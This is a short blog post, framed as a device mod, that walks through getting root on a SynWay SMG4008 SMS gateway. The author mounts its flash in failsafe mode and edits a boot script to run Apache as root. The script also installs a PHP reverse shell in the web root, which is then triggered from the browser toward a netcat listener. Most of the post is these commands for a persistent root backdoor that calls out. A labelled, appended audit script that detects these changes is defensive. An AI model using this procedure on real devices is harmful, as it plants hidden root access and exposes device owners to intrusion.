Friday, 19 May 2017

mod SMG4008

Hi, this mod will show you how to improve the API from 8 secs/sms to 2 secs/sms on the SMG4008 SynWay (Linux OpenWrt Backfire 10.03.1).
First, connect through the console and reboot the device.
Wait until the boot message asks you to "press [f] and [enter]", then press those keys to enter failsafe mode.

Locate the "/init" file and look up the flash device in it:
# cat /init | grep flash

mkdir -p /mnt/flash
mount -t yaffs2 /dev/mtdblock3 /mnt/flash

Run these two commands to mount the flash manually.

Edit the file /mnt/flash/init/S900usrcustom.sh and add:
sed -i 's/User daemon/User root/g' /usr/local/apache/conf/httpd.conf
sed -i 's/Group daemon/Group root/g' /usr/local/apache/conf/httpd.conf
cp /mnt/flash/php-reverse-shell.php /usr/local/apache/htdocs/

Get the file http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz and extract it,
edit it to set the IP/port that the SMS gateway will connect to (read http://pentestmonkey.net/tools/web-shells/php-reverse-shell),
and put it in /mnt/flash/php-reverse-shell.php

Reboot the device or wait until it reboots by itself.

Final step:
On your client box, run netcat, where 1234 is the port you defined in /mnt/flash/php-reverse-shell.php:
# nc -l 1234

In your browser, open:
http://sms_gateway_ip/php-reverse-shell.php
and on your client box, you have root access!

So you can start improving the API.
I'm working with that
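
To check whether a gateway has been changed in the way described above, this added example (not part of the original post or of the device firmware) looks for Apache set to run as root, boot-script lines that touch the web server files, and PHP files under htdocs that both open a socket and spawn a process. The paths are the ones from the post; the function names and the fsockopen/proc_open heuristic are assumptions, and the sample tree is constructed.

```sh
#!/bin/sh
# Added audit example, not from the original post. ROOT is "" on the device
# itself or a directory holding a copy of its files. Function names are made up.

httpd_runs_as_root() {  # exit 0 if an active User/Group directive names root
    awk 'tolower($1) ~ /^(user|group)$/ && ($2 == "root" || $2 == "#0") { hit = 1 }
         END { exit !hit }' "$1"
}

startup_edits() {  # print active boot-script lines touching httpd.conf or htdocs
    grep -nE 'httpd\.conf|/htdocs' "$1" | grep -vE '^[0-9]+:[[:space:]]*#'
}

socket_and_exec_php() {  # print .php files that open a socket and spawn a process
    find "$1" -type f -name '*.php' | while IFS= read -r f; do
        if grep -q 'fsockopen' "$f" && grep -q 'proc_open' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

audit() {  # one line per finding; exit status 1 if anything was found
    root=$1; findings=0
    conf=$root/usr/local/apache/conf/httpd.conf
    boot=$root/mnt/flash/init/S900usrcustom.sh
    docroot=$root/usr/local/apache/htdocs
    if [ -f "$conf" ] && httpd_runs_as_root "$conf"; then
        echo "httpd.conf: Apache set to run as root"; findings=$((findings + 1))
    fi
    if [ -f "$boot" ] && out=$(startup_edits "$boot"); then
        echo "boot script touches web server files:"; echo "$out"; findings=$((findings + 1))
    fi
    if [ -d "$docroot" ] && out=$(socket_and_exec_php "$docroot") && [ -n "$out" ]; then
        echo "PHP with socket + process spawn:"; echo "$out"; findings=$((findings + 1))
    fi
    [ "$findings" -eq 0 ]
}

make_sample() {  # constructed sample tree (not real device data), modified state
    d=$(mktemp -d); a=$d/usr/local/apache
    mkdir -p "$a/conf" "$a/htdocs" "$d/mnt/flash/init"
    printf 'User root\nGroup root\n' > "$a/conf/httpd.conf"
    printf "sed -i 's/User daemon/User root/g' /usr/local/apache/conf/httpd.conf\n" \
        > "$d/mnt/flash/init/S900usrcustom.sh"
    printf '<?php /* constructed marker */ fsockopen(); proc_open();\n' > "$a/htdocs/sample.php"
    printf '%s\n' "$d"
}

if [ "$#" -gt 0 ]; then audit "$1"; fi
```

Run it with "" as the argument on the device, or with the path of an extracted copy of its filesystem; boot-script matches are lines to review, not proof of tampering.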